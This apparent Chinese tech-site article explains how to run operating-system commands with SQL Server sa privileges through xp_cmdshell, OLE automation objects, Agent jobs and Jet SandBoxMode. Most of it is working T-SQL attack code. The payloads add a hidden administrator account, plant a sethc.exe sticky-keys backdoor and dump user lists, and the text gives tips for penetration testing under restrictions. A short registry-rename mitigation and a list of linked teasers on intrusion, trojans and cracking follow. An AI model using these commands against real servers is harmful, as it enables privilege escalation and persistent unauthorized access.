sa权限执行命令 沙盒模式的原理是什么?
测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动)
一.xp_cmdshell
EXEC master..xp_cmdshell ‘ipconfig’
开启xp_cmdshell:
– To allow advanced options to be changed.
EXEC sp_configure ’show advanced options’, 1
GO
– To update the currently configured value for advanced options.
RECONFIGURE
GO
– To enable the feature.
EXEC sp_configure ‘xp_cmdshell’, 1
GO
– To update the currently configured value for this feature.
RECONFIGURE
GO
二.sp_oacreate
创建wscript.shell对象
use master declare @o int exec sp_oacreate ‘wscript.shell’,@o out exec sp_oamethod @o,‘run’,null,‘cmd /c "net user" >c:\test.tmp’
创建scripting.filesystemobject对象
declare @o int
exec sp_oacreate ’scripting.filesystemobject’, @o out
exec sp_oamethod @o, ‘copyfile’,null,‘c:\windows\explorer.exe’ ,‘c:\windows\system32\sethc.exe’;
declare @oo int
exec sp_oacreate ’scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,‘c:\windows\system32\sethc.exe’ ,‘c:\windows\system32\dllcache\sethc.exe’;
可以用utilman.exe代替sethc.exe达到同样的效果 后门很酷吗,呵呵
创建Shell.Application对象
declare @o int
exec sp_oacreate ‘Shell.Application’, @o out
exec sp_oamethod @o, ‘ShellExecute’,null, ‘cmd.exe’,‘cmd /c net user >c:\test.txt’,‘c:\windows\system32′,”,1;
开启OLE Automation Procedures
sp_configure ’show advanced options’, 1;
GO
RECONFIGURE;
GO
sp_configure ‘Ole Automation Procedures’, 1;
GO
RECONFIGURE;
GO
我们的对策就是把对象做一下手脚
WScript.Shell可以调用系统内核运行DOS基本命令
可以通过修改注册表,将此组件改名,来防止危害。
HKEY_CLASSES_ROOT\WScript.Shell\
及HKEY_CLASSES_ROOT\WScript.Shell.1\
改名为其它的名字,如:改为WScript.Shell_ChangeName或WScript.Shell.1_ChangeName
自己以后调用的时候使用这个就可以正常调用此组件了
也要将clsid值也改一下
HKEY_CLASSES_ROOT\WScript.Shell\CLSID\项目的值
HKEY_CLASSES_ROOT\WScript.Shell.1\CLSID\项目的值
同wscript.shell理、scripting.filesystemobject、Shell.Application
三.JOB
利用JOB执行命令,有一个先决条件就是开启SQLSERVERAGENT服务,下面的语句可以开启
exec master.dbo.xp_servicecontrol ’start’,'SQLSERVERAGENT’
use msdb create table [jncsql](resulttxt nvarchar(1024) null) exec sp_delete_job null,‘x’ exec sp_add_job ‘x’ exec
sp_add_jobstep null,‘x’,null,‘1′,‘cmdexec’,‘cmd /c "net user>c:\test.test"’ exec sp_add_jobserver
null,‘x’,@@servername exec sp_start_job ‘x’;
四.SandBoxMode(网上常说的沙盒模式)
原理:在access里调用VBS的shell函数,以system权限执行任何命令。但是试用这个函数之前必须把注册表里的一个叫SandBoxmode的开关打开,
注册表:HKEY_LOCAL_MACHINE\SoFtWare\Micris
oft\Jet\4.0\Engine\SandBoxmode.默认值为2,这个人键值为0表示始
终禁用SandBoxmode模式,1表示对于非Acess应用程序试用SandBoxmode模式,2表示对access应用程序使用SandBoxmode模式,3则表示完全开启安全设置。//1或0都可以执行命令
EXEC sp_addlinkedserver ‘testsql’,'OLE DB Provider for Jet’,'Microsoft.Jet.OLEDB.4.0′,’c:\windows\system32\ias\ias.mdb’
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,‘SOFTWARE\Microsoft\Jet\4.0\Engines’,‘SandBoxMode’,‘REG_DWORD’,1
EXEC master..xp_regread HKEY_LOCAL_MACHINE ,‘Software\Microsoft\Jet\4.0\engines’,‘SandBoxMode’
select * from openrowset(‘microsoft
.jet.oledb.4.0′,‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net user test test /add")’)
select * from openrowset(‘microsoft.jet.oledb.4.0′,
‘;database=c:\windows\system32\ias\ias.mdb’,’select shell("cmd.exe /c net localgroup administrators test /add")’)
下面是系统自带的两个mdb文件
C:\WINDOWS\system32\ias\dnary.mdb
C:\WINDOWS\system32\ias\ias.mdb
总结
上述几种方法(仔细看看我都忘记有几种了,哈哈。你可以发散思维,再找出来几种)都是在默认情况下测试的,往往渗透的时候有很多限制条件,我们可以逐一克服,利用组件得到服务器信息,读取、创建文件了等等,我们还是要对权限这个词组有深层次的理解啊。
附注
关于*.exe c:\windows\system32\ 还有c:\windows\system32\dllcache呢
关于cmd.exe还有command.exe呢
关于net.exe还有net1.exe呢
Mdb文件不存在我们可以上传一个啊
执行命令的组件不是只有一个哦
必须知道的网络技术术语对应的中文意思
LAN 局域网WAN 广域网UTP非屏蔽的双绞线STP屏蔽的双绞线ATM异步传输模式FDDI 光纤分布式数据接口CSMA CD 载波侦听多路访问方法MSAU 多站访问单元ATM异部传输模式PVC永久虚拟回路Hub集线器PSTN 公共
详情2018-01-13 18:10:27责编:llp 来源:驱动管家挂马检测 mcafee服务器如何防挂马?
之前的规则大家一定用了有一段时间,其实上次的规则做的是时间环境是windows 2003的所以相应的规则是针对的IIS 6 0 的今天放出来是windows 2000版的规则放上来大家看看吧 我服务器上用了一段时间了可以用到生产环境
详情2018-01-28 09:33:49责编:llp 来源:驱动管家win7系统如何隐藏文件夹?创建带密码隐藏文件夹
Win7系统下如何创建带密码隐藏的文件夹保护个人隐私文件,按以下步骤进行操作:1、首先创建一个文件夹,并命名为“隐藏文件”;2、然后打开该文件夹,然后在窗口空白处右击鼠标选择“新建→ 文本文档”命令创
详情2018-01-19 10:19:55责编:llp 来源:驱动管家入侵linux系统网站的报告,教你如何入侵网站
我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,aaa帐号试到zzz(by the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比, 如果一个帐号只有两三位长,那
详情2018-02-24 17:27:38责编:llp 来源:驱动管家木马冰河入侵个人电脑的步骤只需十三步
木马冰河是一款功能强大的远程控制软件,因为它的功能很强大所以成为了黑客们发动入侵的工具,2HK联盟Mask曾利用它入侵过数千台电脑,国外电脑也不例外,一起来看看哪十三步简单入侵个人电脑吧。第一步下载必备的
详情2018-01-19 15:49:15责编:llp 来源:驱动管家什么是cuteftp?cuteftp 4.0版本怎么破解?
CuteFTP早期的版本的保护还是比较厉害的,先是KeyFile,后来才改成注册码。它有个3 x版本被拿来作为HCU(High Cracking University)的strainer。4 0版本可以变成注册版,但是输入注册码之后它要连到其公司的服
详情2018-01-25 10:56:03责编:llp 来源:驱动管家web服务器的漏洞 web服务器的保护
Web安全分为两大类:· Web服务器的安全性(Web服务器本身安全和软件配置)。· Web应用程序的安全性(在Web服务器上运行的Java、 ActiveX、PHP、ASP代码的安全)。Web服务器面临的攻击Web服务器攻击利用Web服务器
详情2018-01-08 19:52:37责编:llp 来源:驱动管家163邮箱存在什么漏洞?如何修复?
163邮箱是中国最大的电子邮件服务商网易公司的经典之作,除了收发邮件,主要是可以当网络存储用,就是免费网络硬盘,你可以在需要的时候从你的空间里下载你存储的资料,没U盘时也可以上传,在在自己的电脑里下载
详情2018-01-24 19:52:11责编:llp 来源:驱动管家outlook express是什么?outlook express有漏洞怎么办?
发布日期:2007-10-09更新日期:2007-10-10受影响系统:Microsoft Outlook Express 6 0 SP1Microsoft Outlook Express 6 0Microsoft Outlook Express 5 5 SP2Microsoft Windows Mail描述:---------
详情2018-01-20 11:06:57责编:llp 来源:驱动管家什么是windows defender?windows defender程序的分析破解
Defender与底层操作系统紧密集成在一起,且它是专为在基于NT的Windows系统中运行设计的。它可以在当前所有基于NT的系统中运行,包括Windows XP、Windows Server 2003、Windows 2000和Windows NT 4 0,但不
详情2018-01-18 14:12:32责编:llp 来源:驱动管家
- 如何堵住6129端口?反入侵的方法是什么?
- win10系统恢复驱动器的详细步骤
- C4D的样条线转换成实体模型应该怎么操作
- 怎么使用人生日历的软件来抢火车票
- 电脑上面的reg文件是什么?怎么打开reg文件
- 你真的会用SSD吗 固态硬盘常用知识汇总
- Pop.Up Next是极有抱负的构想 可能会永久改变未来的城市生活
- 大众汽车发布自动驾驶电动概念车I.D.Vizzion
- 关闭u盘在使用过程中的自动播放功能的方法有哪些
- 句柄是什么?句柄的作用有哪些
- 小米怎么关闭手机闹钟?关闭手机闹钟的方法
- 黑莓keyone评测 黑莓keyone是否值得买?
- 电脑开机后自动关机 显示器能点亮但是不能进系统的故障分析
- 电脑显示无法再此为分配空间中创建新卷的解决方法
- XSS wrom网站如何实现入侵?以搜狐博客为例
- 安装mcafee企业版的步骤 mcafee如何用?
- win8/8.1安装驱动时提示“数据无效”的解决方法
- 转换图片格式的方法有哪些?图片格式转换器的介绍
- 怎么用ppt制作出现代圆形的印章?
- 300元内机箱哪家强!六款暑期超值机箱推荐